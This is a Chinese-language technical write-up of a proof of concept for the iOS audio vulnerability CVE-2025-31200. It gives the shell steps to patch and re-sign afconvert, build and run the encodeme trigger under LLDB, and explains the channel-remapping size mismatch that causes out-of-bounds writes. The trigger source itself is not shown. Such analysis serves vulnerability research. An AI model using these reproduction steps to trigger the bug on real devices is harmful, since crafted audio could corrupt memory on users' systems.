揭秘iOS音频漏洞CVE-2025-31200：PoC分析与核心代码解析

# 必需工具
clang++ (支持C++23标准)
lipo (二进制工具)
codesign (代码签名)

#!/bin/sh
# 提取并修改afconvert工具的arm64e架构版本
# 这里的关键操作是修改二进制文件的特定偏移，为漏洞利用创造条件
lipo -thin arm64e /usr/bin/afconvert -output afconvert_arm64e

# 在特定偏移处写入零值，破坏原有结构
# seek=2 指定偏移位置，count=1 写入一个4字节块
dd if=/dev/zero bs=4 seek=2 count=1 of=afconvert_arm64e conv=notrunc

# 重新签名修改后的二进制文件，绕过系统安全机制
codesign --sign - -f afconvert_arm64e

# encodeme程序的编译命令分析
clang++ -g -Os -o encodeme -std=c++23 -fmodules -fcxx-modules -fobjc-arc encodeme.mm

# 参数说明：
# -g：包含调试信息，便于LLDB分析
# -Os：优化代码大小
# -std=c++23：使用C++23标准，支持现代特性
# -fmodules -fcxx-modules：启用C++模块支持
# -fobjc-arc：启用Objective-C自动引用计数
# encodeme.mm：主源文件（Objective-C++）

# 清理和运行脚本
rm output.mp4  # 清理先前生成的音频文件
lldb ./encodeme --source run_encodeme_hook.lldb --batch

# LLDB参数说明：
# --source：加载指定的LLDB调试脚本
# --batch：批量执行模式，非交互式
# run_encodeme_hook.lldb：包含漏洞触发断点和观察点的自定义脚本

// APACHOADecoder::DecodeAPACFrame中的核心漏洞点
// mRemappingArray的大小基于mChannelLayoutTag的低两个字节
// 通过创建它们之间的不匹配，后续处理阶段被破坏

// 当APACHOADecoder处理APAC帧时（根据声道重映射数组置换）
// 使用mRemappingArray作为置换映射进行声道重映射
// 正在被重映射的帧数据大小基于mTotalComponents

// 关键不匹配：
// - mRemappingArray大小：基于mChannelLayoutTag低字节
// - 帧数据大小：基于mTotalComponents
// 这种不匹配导致越界内存访问

# check-mismatch.lldb脚本中的关键观察点
# 观察APACChannelRemapper::Process函数中的内存状态

# 1. mRemappingArray的内容和大小
# 2. 传入的帧数据缓冲区
# 3. 置换操作前后的内存变化
# 4. 越界写入的确切位置和内容